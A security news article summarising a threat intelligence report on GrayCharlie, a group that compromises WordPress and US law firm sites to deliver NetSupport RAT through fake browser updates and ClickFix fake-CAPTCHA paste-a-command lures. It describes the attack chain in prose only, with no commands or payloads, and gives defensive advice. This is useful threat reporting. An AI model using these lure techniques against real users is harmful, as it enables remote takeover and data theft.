The ‘ClickFix’ Trap: GrayCharlie Hijacks US Law Firms to Deploy NetSupport RAT

A highly active cybercriminal group is turning legitimate websites into traps, deploying a potent mix of fake browser updates and deceptive “ClickFix” pop-ups to distribute remote access trojans. A new cyber threat analysis from Recorded Future’s Insikt Group sheds light on the evolving tactics of GrayCharlie, a threat actor that has been systematically compromising WordPress sites since mid-2023.

While the group’s net is cast wide, recent evidence points to a highly targeted supply-chain attack that has compromised the websites of numerous United States law firms.

GrayCharlie’s modus operandi relies on injecting malicious scripts into the Document Object Model (DOM) of legitimate, but vulnerable, WordPress sites. Once a user visits an infected page, the trap is sprung.

According to the report, “GrayCharlie compromises WordPress sites and injects them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms”.

While the group initially relied heavily on fake browser updates, it has adapted its lures. “In late March or early April 2025, SmartApeSG shifted from using fake browser updates to deploying ClickFix lures, mirroring a broader trend among threat actors of increasingly adopting ClickFix”. These ClickFix prompts often masquerade as fake CAPTCHA verifications, instructing users to press Win+R and paste a malicious command. This command secretly downloads and executes the NetSupport RAT in the background.

The researchers noted that “Insikt Group identified a cluster of United States (US) law firm sites that were likely compromised around November 2025, possibly through a supply-chain compromise involving a shared IT provider”.

The investigation uncovered that at least fifteen law firm websites were actively loading external malicious JavaScript. The common denominator appears to be a third-party IT provider. “One potential avenue is SMB Team, the self-described ‘fastest-growing law firm acceleration company,’ which has supported thousands of firms across North America… as its logo and other references appear across many of the websites”. The report suggests the threat actors may have gained access to this infrastructure through legitimate, compromised credentials.

Once GrayCharlie establishes a foothold via the NetSupport RAT, the infection rarely stops there. The group maintains an extensive command-and-control (C2) infrastructure, largely hosted on MivoCloud and HZ Hosting Ltd.

Once connected to this C2 network, the operators can execute reconnaissance commands, steal files, and deploy secondary malware. The report warns that “These infections often progress to the deployment of Stealc and SectopRAT”.

The ultimate goals of GrayCharlie remain focused on data theft and financial gain. To mitigate this persistent threat, organizations are urged to update their defenses. “To protect against GrayCharlie, security defenders should block IP addresses and domains tied to associated remote access trojans (RATs) and infostealers, flag and potentially block connections to compromised websites, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections”.

Related Posts:

• Hackers are trying to install NetSupport Remote Access Tool on victim machine through Fake Software Update
• Cisco Talos Warns of Stealthy NetSupport RAT Campaigns
• NetSupport RAT Returns: Weaponized via WordPress & “ClickFix” for Remote Access
• Threat Actors Exploit GitHub to Spread Malware, Targeting Multiple Operating Systems